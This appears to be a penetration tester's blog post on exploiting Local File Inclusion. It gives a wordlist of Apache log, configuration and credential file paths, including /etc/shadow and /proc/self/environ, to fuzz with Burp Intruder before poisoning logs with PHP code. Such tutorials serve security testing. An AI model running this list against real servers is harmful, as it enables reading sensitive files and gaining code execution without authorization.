Often when conducting security assessments it is necessary to go beyond just identifying the vulnerability, reporting it and heading out for a beer. Sometimes, like when conducting a penetration test or when asked by a client to demonstrate business risk, it is necessary to gain command line line access to the machine to show the risks associated with having a web user being able to execute commands on their machine. Often this involves getting a shell by some means but in the case of Local File Inclusion (LFI) simply finding the Apache Log location folder can be enough to start running commands on the system as the Apache service account.

Often I’ve wasted hours trying all sorts of combinations trying to find the correct location of the log files by looking up version numbers and identifying operating systems but being the true to the Pentesters code, sometimes it’s better to be lazy and just automate the damn thing. So what a buddy of mine and me did was to compile a list of common Apache log file locations and files that may indicate Apache log locations across different operating systems. This list is by no means comprehensive and if the developer or engineer has bothered to spend 5 minutes moving the log file locations then chances are that this list may not help you.

Luckily, most people don’t bother moving logs which makes this a great list to work with. Below is an example of how to use this list to quickly discover the location of the Apache log location after you’ve located a LFI vulnerability.

This tutorial will utilize Burp Suite, one of the better Web Testing suites available. If you don’t have a copy yet, go get it from http://www.portswigger.net/burp/. The paid version of the software does not have the timing restrictions and is well worth getting to speed up this attack.

To start, copy the contents of this list and save it somewhere you can access through Burp Suite.

/Library/WebServer/Documents/index.php
/Library/WebServer/Documents/index.html
/apache/logs/access.log
/apache/logs/error.log
/etc/GeoIP.conf.default
/etc/PolicyKit/PolicyKit.conf
/etc/X11/xorg.conf
/etc/X11/xorg.conf-vesa
/etc/X11/xorg.conf-vmware
/etc/X11/xorg.conf.BeforeVMwareToolsInstall
/etc/X11/xorg.conf.orig
/etc/adduser.conf
/etc/airoscript.conf
/etc/apache2/apache2.conf
/etc/apache2/conf.d
/etc/apache2/conf.d/charset
/etc/apache2/conf.d/security
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/apache2/mods-available/autoindex.conf
/etc/apache2/mods-available/deflate.conf
/etc/apache2/mods-available/dir.conf
/etc/apache2/mods-available/mem_cache.conf
/etc/apache2/mods-available/mime.conf
/etc/apache2/mods-available/proxy.conf
/etc/apache2/mods-available/setenvif.conf
/etc/apache2/mods-available/ssl.conf
/etc/apache2/mods-enabled/alias.conf
/etc/apache2/mods-enabled/deflate.conf
/etc/apache2/mods-enabled/dir.conf
/etc/apache2/mods-enabled/mime.conf
/etc/apache2/mods-enabled/negotiation.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-enabled/status.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/default
/etc/apache2/sites-enabled/000-default
/etc/apt/apt.conf.d
/etc/apt/apt.conf.d/00trustcdrom
/etc/apt/apt.conf.d/01autoremove
/etc/apt/apt.conf.d/01ubuntu
/etc/apt/apt.conf.d/05aptitude
/etc/apt/apt.conf.d/50unattended-upgrades
/etc/apt/apt.conf.d/70debconf
/etc/arpalert/arpalert.conf
/etc/avahi/avahi-daemon.conf
/etc/bash_completion.d/debconf
/etc/belocs/locale-gen.conf
/etc/bluetooth/input.conf
/etc/bluetooth/main.conf
/etc/bluetooth/network.conf
/etc/bluetooth/rfcomm.conf
/etc/bonobo-activation/bonobo-activation-config.xml
/etc/ca-certificates.conf
/etc/ca-certificates.conf.dpkg-old
/etc/casper.conf
/etc/chkrootkit.conf
/etc/clamav/clamd.conf
/etc/clamav/freshclam.conf
/etc/conky/conky.conf
/etc/console-tools/config.d
/etc/console-tools/config.d/splashy
/etc/cups/acroread.conf
/etc/cups/cupsd.conf
/etc/cups/cupsd.conf.default
/etc/cups/pdftops.conf
/etc/cups/printers.conf
/etc/cvs-cron.conf
/etc/cvs-pserver.conf
/etc/dbus-1/session.conf
/etc/dbus-1/system.conf
/etc/debconf.conf
/etc/defoma/config
/etc/defoma/config/x-ttcidfont-conf.conf2
/etc/deluser.conf
/etc/depmod.d/ubuntu.conf
/etc/dhcp3/dhclient.conf
/etc/dhcp3/dhcpd.conf
/etc/discover-modprobe.conf
/etc/discover.conf.d
/etc/discover.conf.d/00discover
/etc/dns2tcpd.conf
/etc/e2fsck.conf
/etc/esound/esd.conf
/etc/etter.conf
/etc/fonts/conf.d
/etc/fonts/conf.d/README
/etc/foomatic/filter.conf
/etc/foremost.conf
/etc/freetds/freetds.conf
/etc/fuse.conf
/etc/gconf
/etc/gconf/2
/etc/gconf/2/evoldap.conf
/etc/gconf/2/path
/etc/gconf/gconf.xml.defaults
/etc/gconf/gconf.xml.defaults/%gconf-tree.xml
/etc/gconf/gconf.xml.mandatory
/etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
/etc/gconf/gconf.xml.system
/etc/gdm/failsafeDexconf
/etc/gnome-vfs-2.0/modules/default-modules.conf
/etc/gnome-vfs-2.0/modules/extra-modules.conf
/etc/gre.d/1.9.0.10.system.conf
/etc/gre.d/1.9.0.14.system.conf
/etc/gre.d/1.9.0.15.system.conf
/etc/group
/etc/gtk-2.0/im-multipress.conf
/etc/hdparm.conf
/etc/host.conf
/etc/htdig/htdig.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/mod_php.conf
/etc/inetd.conf
/etc/initramfs-tools/conf.d
/etc/irssi.conf
/etc/java-6-sun/fontconfig.properties
/etc/kbd/config
/etc/kernel-img.conf
/etc/kernel-pkg.conf
/etc/ld.so.conf
/etc/ldap/ldap.conf
/etc/logrotate.conf
/etc/ltrace.conf
/etc/mail/sendmail.conf
/etc/manpath.config
/etc/menu-methods/menu.config
/etc/miredo-server.conf
/etc/miredo.conf
/etc/miredo/miredo-server.conf
/etc/miredo/miredo.conf
/etc/modprobe.d/vmware-tools.conf
/etc/mono/1.0/machine.config
/etc/mono/2.0/machine.config
/etc/mono/2.0/web.config
/etc/mono/config
/etc/mtools.conf
/etc/mysql/conf.d
/etc/mysql/conf.d/old_passwords.cnf
/etc/nsswitch.conf
/etc/oinkmaster.conf
/etc/openvpn/update-resolv-conf
/etc/pam.conf
/etc/passwd
/etc/pear/pear.conf
/etc/php.ini
/etc/php/php.ini
/etc/php5/apache2/conf.d
/etc/php5/apache2/php.ini
/etc/php5/php.ini
/etc/pm/config.d
/etc/pm/config.d/00sleep_module
/etc/postgresql-common/autovacuum.conf
/etc/prelude/default/global.conf
/etc/prelude/default/idmef-client.conf
/etc/prelude/default/tls.conf
/etc/privoxy/config
/etc/proxychains.conf
/etc/pulse/client.conf
/etc/python/debian_config
/etc/reader.conf
/etc/reader.conf.d
/etc/reader.conf.d/0comments
/etc/reader.conf.d/libccidtwin
/etc/reader.conf.old
/etc/remastersys.conf
/etc/resolv.conf
/etc/resolvconf
/etc/resolvconf/update-libc.d
/etc/resolvconf/update-libc.d/sendmail
/etc/rinetd.conf
/etc/samba/dhcp.conf
/etc/samba/smb.conf
/etc/scrollkeeper.conf
/etc/security/access.conf
/etc/security/group.conf
/etc/security/limits.conf
/etc/security/namespace.conf
/etc/security/opasswd
/etc/security/pam_env.conf
/etc/security/sepermit.conf
/etc/security/time.conf
/etc/sensors.conf
/etc/shadow
/etc/skel/.config
/etc/skel/.config/Trolltech.conf
/etc/skel/.config/codef00.com
/etc/skel/.config/menus
/etc/skel/.config/menus/applications-kmenuedit.menu
/etc/skel/.config/user-dirs.dirs
/etc/skel/.config/user-dirs.locale
/etc/skel/.kde3/share/apps/kconf_update
/etc/skel/.kde3/share/apps/kconf_update/log/update.log
/etc/skel/.kde3/share/share/apps/kconf_update
/etc/skel/.kde3/share/share/apps/kconf_update/log
/etc/skel/.kde3/share/share/apps/kconf_update/log/update.log
/etc/smi.conf
/etc/snmp/snmpd.conf
/etc/snort/reference.config
/etc/snort/rules/emerging.conf
/etc/snort/rules/open-test.conf
/etc/snort/snort-mysql.conf
/etc/snort/snort.conf
/etc/snort/threshold.conf
/etc/splashy/config.xml
/etc/ssh/sshd_config
/etc/stunnel/stunnel.conf
/etc/subversion/config
/etc/sysctl.conf
/etc/sysctl.d/10-console-messages.conf
/etc/sysctl.d/10-network-security.conf
/etc/sysctl.d/10-process-security.conf
/etc/sysctl.d/wine.sysctl.conf
/etc/syslog.conf
/etc/tinyproxy/tinyproxy.conf
/etc/tor/tor-tsocks.conf
/etc/tpvmlp.conf
/etc/tsocks.conf
/etc/ucf.conf
/etc/udev/udev.conf
/etc/ufw/sysctl.conf
/etc/ufw/ufw.conf
/etc/uniconf.conf
/etc/unicornscan/modules.conf
/etc/unicornscan/payloads.conf
/etc/unicornscan/unicorn.conf
/etc/updatedb.conf
/etc/updatedb.conf.BeforeVMwareToolsInstall
/etc/vmware-tools/config
/etc/vmware-tools/tpvmlp.conf
/etc/vmware-tools/vmware-tools-libraries.conf
/etc/w3m/config
/etc/wicd/dhclient.conf.template.default
/etc/wicd/manager-settings.conf
/etc/wicd/wired-settings.conf
/etc/wicd/wireless-settings.conf
/etc/xdg/user-dirs.conf
/logs/access.log
/logs/error.log
/private/etc/apache2/extra/httpd-default.conf
/private/etc/apache2/extra/httpd-userdir.conf
/private/etc/apache2/extra/httpd-vhosts.conf
/private/etc/apache2/mime.types
/private/var/log/apache2/access_log
/private/var/log/apache2/error_log
/proc/cpuinfo
/proc/meminfo
/proc/self/cmdline
/proc/self/environ
/proc/self/mounts
/proc/self/stat
/proc/self/status
/proc/version
/share/snmp/snmpd.conf
/srv/www/htdocs/index.html
/usr/bin/php/php.ini
/usr/bin/php5/bin/php.ini
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error_log
/usr/local/etc/apache2/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/www/apache22/data/index.html
/usr/pkg/etc/httpd/httpd.conf
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/httpd-access.log
/var/log/httpd-error.log
/var/log/httpd/access.log
/var/log/httpd/access_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/www/conf/httpd.conf
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/wwwroot/php/php.ini

Once you have saved this list somewhere, open up Burp Suite, locate the LFI injection point and send the request to Burp Intruder.

In the Burp Intruder window, select the Positions tab and mark the position of your LFI injection point. Change the attack type to Sniper. Then under the Payloads tab, choose the Apache logs list or paste the contents of the list into the payload window.

Start the attack and pay attention to the length column. Typically Apache log folders are going to be large and should return a large length field.

When you find a length field that is significantly larger than the other requests, look at the response to see if the contents returned match what an Apache log file would look like. If it does look like a log file and you can see some of your previous traffic displayed, you have successfully found the Apache log location and can now use this to start injecting your PHP code to run requests on the target machine.

I will outline the steps to complete this in the next post.

this log list is not comprehensive and I will continue to add to it as I find more more locations as well as some windows folder locations.

Keep on sploiting,

norsec0de